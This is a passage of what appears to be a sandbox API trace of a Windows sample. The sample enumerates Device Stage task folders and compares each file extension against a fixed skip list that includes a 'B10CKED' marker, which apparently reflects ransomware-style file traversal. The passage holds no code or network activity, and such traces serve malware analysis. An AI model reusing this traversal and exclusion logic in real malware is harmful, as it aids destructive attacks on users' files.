Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\EN-US\\") returned 0x5c [0108.398] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\EN-US\\") returned 0x5c [0108.398] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\EN-US\\") returned 0x5c [0108.398] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\EN-US\\") returned 0x5c [0108.398] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\EN-US\\") returned 0x5c [0108.398] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\EN-US\\") returned 0x5c [0108.398] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\EN-US\\") returned 0x5c [0108.398] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*.*", lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 0x1c8028 [0108.399] FindNextFileW (in: hFindFile=0x1c8028, lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 1 [0108.399] FindNextFileW (in: hFindFile=0x1c8028, lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 1 [0108.399] CharUpperBuffW (in: lpsz="xml", cchLength=0x3 | out: lpsz="XML") returned 0x3 [0108.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="XML", cchCount2=3) returned 1 [0108.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="XML", cchCount2=3) returned 1 [0108.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="XML", cchCount2=3) returned 2 [0108.399] FindNextFileW (in: hFindFile=0x1c8028, lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 0 [0108.399] FindClose (in: hFindFile=0x1c8028 | out: hFindFile=0x1c8028) returned 1 [0108.399] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.400] CharUpperBuffW (in: lpsz="ico", cchLength=0x3 | out: lpsz="ICO") returned 0x3 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="ICO", cchCount2=3) returned 1 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="ICO", cchCount2=3) returned 1 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="ICO", cchCount2=3) returned 2 [0108.400] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.400] CharUpperBuffW (in: lpsz="ico", cchLength=0x3 | out: lpsz="ICO") returned 0x3 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="ICO", cchCount2=3) returned 1 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="ICO", cchCount2=3) returned 1 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="ICO", cchCount2=3) returned 2 [0108.400] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.400] CharUpperBuffW (in: lpsz="ico", cchLength=0x3 | out: lpsz="ICO") returned 0x3 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="ICO", cchCount2=3) returned 1 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="ICO", cchCount2=3) returned 1 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="ICO", cchCount2=3) returned 2 [0108.400] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.400] CharUpperBuffW (in: lpsz="xml", cchLength=0x3 | out: lpsz="XML") returned 0x3 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="XML", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="XML", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="XML", cchCount2=3) returned 2 [0108.401] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.401] CharUpperBuffW (in: lpsz="ico", cchLength=0x3 | out: lpsz="ICO") returned 0x3 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="ICO", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="ICO", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="ICO", cchCount2=3) returned 2 [0108.401] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.401] CharUpperBuffW (in: lpsz="ico", cchLength=0x3 | out: lpsz="ICO") returned 0x3 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="ICO", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="ICO", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="ICO", cchCount2=3) returned 2 [0108.402] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.402] CharUpperBuffW (in: lpsz="ico", cchLength=0x3 | out: lpsz="ICO") returned 0x3 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="ICO", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="ICO", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="ICO", cchCount2=3) returned 2 [0108.402] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.402] CharUpperBuffW (in: lpsz="xml", cchLength=0x3 | out: lpsz="XML") returned 0x3 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="XML", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="XML", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.403] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="XML", cchCount2=3) returned 2 [0108.403] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.403] CharUpperBuffW (in: lpsz="ico", cchLength=0x3 | out: lpsz="ICO") returned 0x3 [0108.403] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.403] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.403] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="ICO", cchCount2=3) returned 1 [0108.403] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.403] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.403] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.403] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.403] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.403] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="ICO", cchCount2=3) returned 1 [0108.403] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.403] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="ICO", cchCount2=3) returned 2 [0108.403] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 0 [0108.403] FindClose (in: hFindFile=0x1c7fe8 | out: hFindFile=0x1c7fe8) returned 1 [0108.403] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0108.403] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\") returned 0x56 [0108.403] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\") returned 0x56 [0108.403] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\") returned 0x56 [0108.403] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\") returned 0x56 [0108.403] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\") returned 0x56 [0108.403] 